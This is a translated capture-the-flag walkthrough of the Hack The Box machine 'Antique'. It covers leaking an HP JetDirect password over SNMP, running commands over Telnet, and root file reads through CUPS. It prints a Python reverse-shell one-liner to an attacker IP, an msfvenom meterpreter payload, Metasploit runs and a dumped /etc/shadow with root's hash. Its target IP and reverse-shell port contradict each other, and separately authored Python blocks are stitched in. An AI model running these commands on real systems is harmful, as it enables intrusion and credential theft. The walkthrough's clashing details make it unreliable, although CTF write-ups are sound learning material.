Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods used here are for learning and exchange only. Do not use the tools or the intrusion ideas from this article for any illegal purpose. I am not responsible for any consequences arising from that, nor for any misuse or damage caused.

Service detection

```
┌──(root💀kali)-[~/HTB/Antique]
└─# nmap -sV -Pn 10.10.11.88
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds
```

Port 23 is running a Telnet service; connect with nc to take a look.

```
┌──(root💀kali)-[~/HTB/Antique]
└─# nc 10.10.11.88 23
HP JetDirect

ls
Password: 123456
Invalid Password
```

The banner is HP JetDirect; I looked it up and it is an HP printer (print server).

Logging in over Telnet requires a password, but no account name.

Searching Google for "HP JetDirect Telnet" turns up this article.

Following the article's method, "Getting a JetDirect Password Remotely" via the SNMP vulnerability, we run the following:

```
┌──(root💀kali)-[~/HTB/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
```

Decode the hex bytes above from hex to text (I used the Hex2text website) and the password is P@ssw0rd@123!!123
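The decoding can also be done offline, which avoids pasting a device credential into a third-party web form. The following Python is an added example, not code from the article: it parses the `BITS:` line shown above (the sample line is copied from that output) and recovers the text. It also accounts for the trailing numbers in that output: net-snmp prints a BITS value as hex octets followed by the indices of the set bits (numbered MSB-first from 0), and the parser uses that list to find exactly where the octets end instead of guessing.

```python
import re
from typing import List, Optional

# Output line copied from the snmpget run in the article. The hex tokens are the
# OID's value; the trailing decimals are the indices of the set bits, which
# net-snmp appends when it prints a BITS value.
SNMPGET_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 "
    "31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 "
    "35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 "
    "94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135"
)


def set_bit_positions(data: bytes) -> List[int]:
    """Indices of the set bits, MSB-first from bit 0 (the SNMP BITS convention)."""
    positions = []
    for i, byte in enumerate(data):
        for bit in range(8):
            if byte & (0x80 >> bit):
                positions.append(i * 8 + bit)
    return positions


def split_bits_value(tokens: List[str]) -> Optional[bytes]:
    """Find the split between the hex octets and the trailing bit-index list.

    Two-digit decimals such as '50' are also valid hex, so the split cannot be
    found by token shape alone; instead take the split where the index list
    exactly describes the octets before it.
    """
    for k in range(len(tokens), 0, -1):
        head, tail = tokens[:k], tokens[k:]
        if not all(re.fullmatch(r"[0-9a-fA-F]{2}", t) for t in head):
            continue
        if not all(t.isdigit() for t in tail):
            continue
        data = bytes.fromhex("".join(head))
        if set_bit_positions(data) == [int(t) for t in tail]:
            return data
    return None


def decode_bits_line(line: str) -> Optional[str]:
    """Return the printable ASCII text held in a 'BITS:' snmpget line, or None."""
    m = re.search(r"=\s*BITS:\s*(.*)$", line)
    if not m:
        return None
    data = split_bits_value(m.group(1).split())
    if data is None or not all(0x20 <= b < 0x7F for b in data):
        return None
    return data.decode("ascii")


if __name__ == "__main__":
    print(decode_bits_line(SNMPGET_LINE))
```

The same parser works for any `BITS:` value net-snmp prints, not only this OID; a value that is not printable text returns `None` rather than a mangled string.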

Log in to Telnet with the credentials above.

```
┌──(root💀kali)-[~/HTB/Antique]
└─# nc 10.10.11.88 23
HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name  Type of value
ip:             IP-address in dotted notation
subnet-mask:    address in dotted notation (enter 0 for default)
default-gw:     address in dotted notation (enter 0 for default)
syslog-svr:     address in dotted notation (enter 0 for default)
idle-timeout:   seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name:      alpha-numeric string (upper case only, 32 chars max)
dhcp-config:    0 to disable, 1 to enable
allow:          <ip> [mask] (0 to clear, list to display, 10 max)
addrawport:     <TCP port num> (<TCP port num> 3000-9000)
deleterawport:  <TCP port num>
listrawport:    (No parameter required)
exec:           execute system commands (exec id)
exit:           quit from telnet session

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp
/var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt
```

Privilege escalation

View system information

```
> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10
```

Since python3 is installed, use the following command to spawn a reverse shell that is more convenient to work in.

```
exec python3 -c 'import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.15",4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh")'
```

```
┌──(root💀kali)-[~/HTB/Antique]
└─# nc -lnvp 762
listening on [any] 762 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$
```

The lpadmin group membership stands out and may be usable for privilege escalation. After googling, I found this article.

It says:

members of lpadmin can read every file on server via cups

Since this group can read any file on the system, I searched for an escalation script. In the end, the Metasploit module multi/escalate/cups_root_file_read can be used for the escalation.

Generate a Metasploit reverse shell payload with msfvenom:

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf
```

Transfer it to the target, run it, catch the session in Metasploit, and execute the escalation module:

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid
```

Check the /etc/shadow file:

```
┌──(root💀kali)-[~/HTB/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::
```

Convert it into a format John the Ripper can read:

```
┌──(root💀kali)-[~/HTB/Antique]
└─# cat shadow.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::

┌──(root💀kali)-[~/HTB/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt

┌──(root💀kali)-[~/HTB/Antique]
└─# cat unshadowed.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash
```

But I could not crack the hash.
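As an added example (not code from the article), the following Python audits shadow entries like the dump above. It shows why only the root line was worth feeding to John: every other account is locked (`*` or `!` in the password field), and root's hash is SHA-512 crypt (`$6$`); it also turns the "days since epoch" field into a date, which is what an administrator checks when reviewing password age. The shadow entries are copied from the dump; the passwd fragment is constructed, with root's line as implied by the unshadow output and the others typical defaults. The `unshadow` function reproduces the merge that John's unshadow tool did above.

```python
from datetime import date, timedelta
from typing import Dict, List, Optional

# Entries copied from the /etc/shadow dump in the article.
SHADOW_SAMPLE = """\
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::
"""

# Constructed /etc/passwd fragment for the accounts above (root as implied by
# the article's unshadow output; the rest are typical Ubuntu defaults).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
"""

# crypt(3) identifiers found after the leading '$'
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "y": "yescrypt", "2b": "bcrypt", "2y": "bcrypt"}


def classify_hash(field: str) -> str:
    """Describe a shadow password field."""
    if field == "":
        return "empty (no password required)"
    if field.startswith(("*", "!")):
        return "locked"
    if field.startswith("$"):
        ident = field.split("$")[1]
        return CRYPT_IDS.get(ident, "unknown $" + ident + "$")
    return "legacy DES crypt"


def days_to_date(days: str) -> Optional[date]:
    """Shadow stores dates as days since 1970-01-01; empty means unset."""
    if days == "":
        return None
    return date(1970, 1, 1) + timedelta(days=int(days))


def audit_shadow(text: str) -> Dict[str, dict]:
    """Per-account summary: hash type, whether a real hash is present, last change."""
    report = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("malformed shadow line for " + fields[0])
        user, pw, lastchg, maxage = fields[0], fields[1], fields[2], fields[4]
        report[user] = {
            "hash_type": classify_hash(pw),
            "crackable": pw.startswith("$"),
            "last_change": days_to_date(lastchg),
            "max_age": int(maxage) if maxage else None,
        }
    return report


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Merge passwd and shadow like John's unshadow: the hash replaces the 'x'."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            user, pw = line.split(":")[:2]
            hashes[user] = pw
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        f[1] = hashes.get(f[0], f[1])
        merged.append(":".join(f))
    return merged


if __name__ == "__main__":
    for user, info in audit_shadow(SHADOW_SAMPLE).items():
        print(user, info)
    print("\n".join(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)))
```

Run against a full shadow file, the report lists exactly which accounts carry a usable hash and how old each password is; for the dump above that is one account, root, last changed 2021-05-13.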

Try root's id_rsa file instead, by editing the MSF module:

```
msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit
```

Change line 46 to /root/.ssh/id_rsa

Save and exit the editor.

Run the module again to download the file locally:

```
meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...
```

However, this file does not exist; what was saved is a CUPS "Not Found" page:

```
┌──(root💀kali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
	<TITLE>Not Found - CUPS v1.6.1</TITLE>
	<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Not Found</H1>
<P></P>
</BODY>
</HTML>
```

In the end I just downloaded /root/root.txt to the local machine and finished at 1:00 in the morning, which concluded this box.

```
meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...
```